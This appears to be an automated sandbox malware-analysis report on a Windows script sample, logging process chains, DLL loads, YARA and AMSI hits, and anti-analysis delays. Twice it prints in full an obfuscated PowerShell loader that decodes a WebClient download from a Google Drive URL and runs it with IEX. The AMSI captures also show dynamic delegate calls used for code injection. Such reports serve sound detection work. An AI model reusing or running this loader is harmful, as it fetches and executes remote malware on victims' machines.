              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU 
saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periJump to behavior
              Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: schannel.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winmm.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: comsvcs.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cmlua.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cmutil.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: textshaping.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: textinputframework.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coreuicomponents.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: stem.Core.pdb's source: powershell.exe, 00000005.00000002.2550293525.000000000790D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2150718779.000001D40D721000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2154799674.000001D40B882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2154578700.000001D40B882000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdb source: powershell.exe, 00000005.00000002.2550293525.000000000790D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.2423263275.00000298B848E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ystem.pdbb source: powershell.exe, 00000002.00000002.2421753181.00000298B8208000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2550293525.0000000007859000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2550293525.0000000007859000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: Yara match File source: 00000005.00000002.2559922258.000000000A849000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.2558798710.0000000008C10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.2543351346.0000000005D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000002.2415519775.00000298AFCC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Sleuthhound)$gLObaL:UNSeCrETED = [SYSTeM.tEXT.eNcODiNg]::aScii.GETSTRiNG($foReGGlingENS)$GloBAL:EUrOpAmESTERens=$uNSecRetEd.suBSTrinG($ThIMOTHeuSSnDSAmlES,$DesmoLase)<#Juxtapositiona
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((corgi $Sanktvejtsdans $Rethaveres), (Blueline @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Discourteousness = [AppDomain]::CurrentDomain.GetAssemblies()
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Trailway)), $Destillerier).DefineDynamicModule($Vestkystens, $false).DefineType($Unacerbically, $checkerberries, [System.MulticastDele
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Sleuthhound)$gLObaL:UNSeCrETED = [SYSTeM.tEXT.eNcODiNg]::aScii.GETSTRiNG($foReGGlingENS)$GloBAL:EUrOpAmESTERens=$uNSecRetEd.suBSTrinG($ThIMOTHeuSSnDSAmlES,$DesmoLase)<#Juxtapositiona
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU 
saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07822BC8 push eax; ret 5_2_07822BC9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_092E2966 push 0000003Ch; ret 5_2_092E2968
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_092E0A1D push edx; retf 5_2_092E0A2C
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_04460A1D push edx; retf 8_2_04460A2C
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_04462966 push 0000003Ch; ret 8_2_04462968
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_092E29A8 rdtsc 5_2_092E29A8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5124
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4787
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8209
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1461
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7920 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: powershell.exe, 00000002.00000002.2423263275.00000298B846B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
              Source: msiexec.exe, 00000008.00000002.2700386932.0000000008386000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: msiexec.exe, 00000008.00000002.2700386932.000000000832A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
